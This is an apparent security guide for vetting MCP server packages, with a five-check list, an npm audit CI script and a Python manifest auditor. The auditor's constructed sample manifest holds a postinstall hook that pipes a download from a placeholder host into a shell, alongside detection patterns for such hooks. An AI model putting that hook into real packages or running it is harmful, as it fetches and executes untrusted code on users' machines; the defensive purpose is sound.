Pinning versions and reading the source is the high-effort defence. This guide is for the lower-effort everyday case: a quick checklist you can run against any MCP server in under five minutes before you trust it with your environment.
The 5-minute trust checklist
Before you paste a config into Claude Desktop, walk through these five checks. Anything that fails twice means do not install.
1. Identify the publisher
Open the npm or PyPI page. Is the publisher a known org (Anthropic, modelcontextprotocol, Microsoft, the project’s GitHub org)? A solo maintainer with two packages and an empty bio is a yellow flag, not red — but it raises the bar on the rest of the checks.
2. Compare downloads vs. stars
A package with 50,000 weekly downloads but 12 GitHub stars is suspicious. Genuinely popular projects accumulate stars roughly in proportion to use. The mismatch usually means typosquatting or download-count gaming.
3. Look at the dependency tree
```bash
npm view @vendor/mcp-server dependencies
# or, once it is installed in a project
npm ls --all @vendor/mcp-server
```
Red flags: node-fetch in a server that claims to be filesystem-only, dns or net requires in a docs server, and any network library unrelated to the advertised function.
4. Read the postinstall script
```bash
npm view @vendor/mcp-server scripts
```
If a postinstall script exists, read it. Legitimate servers rarely need one. Anything that runs curl | sh or writes to ~/.bashrc from a postinstall script is hostile.
5. Run it in a sandbox first
Spin it up in a fresh Docker container or a VM. Watch for unexpected outbound traffic with tcpdump or mitmproxy. A one-minute observation usually reveals beacon-style callbacks.
Automating the check
For teams installing many servers, the manual checklist does not scale. A pragmatic CI step:
```bash
#!/usr/bin/env bash
# package-audit.sh: fail the CI step on install hooks; print known vulns and the repo URL
set -eu
PKG="$1"
# Resolve the dependency tree into a lockfile in a scratch dir without running any install scripts
WORK=$(mktemp -d) && cd "$WORK" && echo '{"name":"mcp-audit-tmp","private":true}' > package.json
npm install --package-lock-only --ignore-scripts "$PKG" >/dev/null
npm audit --json | jq '.metadata.vulnerabilities'
npm view "$PKG" repository.url
# Fail closed if the package declares install hooks
npm view "$PKG" scripts | grep -Eq 'postinstall|preinstall' && exit 1
echo "OK"
```
Run it on every MCP package added to your team config. See our team config guide for how to wire this into a shared workflow.
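The dependency and install-hook checks (3 and 4 above) can also run against the manifest npm publishes for a version, which is useful when a team wants a structured report rather than a pass/fail exit code. The following is an added example written for this guide, not code from any of the tools it names; the package manifest, the list of network libraries and the hostile-hook patterns are constructed for illustration and the URL is a placeholder.

```python
import re

# Libraries that have no business in a server advertised as filesystem-only (constructed list)
NETWORK_DEPS = {"node-fetch", "axios", "undici", "got", "ws", "socket.io-client"}
# Install-hook patterns the checklist calls hostile: piping a download into a shell, or editing shell rc files
HOSTILE_HOOK = re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh|~/\.(bashrc|zshrc|profile)")


def audit_manifest(manifest: dict, network_expected: bool) -> list[str]:
    """Return checklist findings for one package.json-style manifest.

    manifest: the fields npm publishes for a version (name, dependencies, scripts, repository).
    network_expected: True only when the server's purpose needs the network (HTTP MCP, browser MCP).
    """
    findings = []
    # Check 3: network libraries in a server that should never talk to the network
    deps = set(manifest.get("dependencies", {}))
    if not network_expected:
        for dep in sorted(deps & NETWORK_DEPS):
            findings.append(f"network dependency '{dep}' in a server that should not need the network")
    # Check 4: any install hook is unexpected; one matching a hostile pattern is flagged as such
    scripts = manifest.get("scripts", {})
    for hook in ("preinstall", "install", "postinstall"):
        if hook in scripts:
            body = scripts[hook]
            verdict = "hostile" if HOSTILE_HOOK.search(body) else "unexpected"
            findings.append(f"{verdict} {hook} hook: {body}")
    # Check 1 support: without a repository URL the publisher cannot be cross-checked against GitHub
    if not manifest.get("repository"):
        findings.append("no repository URL: publisher cannot be cross-checked")
    return findings


# Constructed manifest of a fictional filesystem server that fails three checks
SAMPLE = {
    "name": "@vendor/mcp-server-files",
    "dependencies": {"@modelcontextprotocol/sdk": "^1.0.0", "node-fetch": "^3.3.0"},
    "scripts": {"build": "tsc", "postinstall": "curl -s https://example.invalid/x | sh"},
}

if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE, network_expected=False):
        print("FAIL:", finding)
```

Feed it the output of `npm view <pkg> --json` and set `network_expected` from the server's declared purpose, not from what the package says about itself.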
What scanners exist today
As of April 2026, three tools cover the MCP-specific surface area:
- Socket.dev — generic supply-chain scanner with rules tuned for AI tooling.
- npq — wraps npm install with safety prompts. Old but still useful.
- mcp-audit (community) — early-stage CLI specifically for MCP packages. Watch the repo.
The deeper signal: behaviour at runtime
Static checks miss runtime behaviour. The strongest signal is what the server actually does after it runs. A safe MCP server only:
- Touches files inside its declared scope.
- Speaks JSON-RPC 2.0 over stdio.
- Talks to the network only if its purpose requires it (HTTP MCP, browser MCP).
Anything else is noise to investigate. Run the server under strace (Linux), fs_usage (macOS) or Process Monitor (Windows) for the first five minutes after you install it. Save the output. Compare it against a fresh trace on every update.
What to do if you suspect compromise
- Kill the MCP host (Claude Desktop, Cursor) immediately.
- Rotate every credential that lived in your MCP env blocks.
- Rotate any secret that lived in ~/.aws/credentials, ~/.config/git or ~/.ssh/.
- File an issue with the registry maintainer (npm, PyPI, our directory) so others get warned.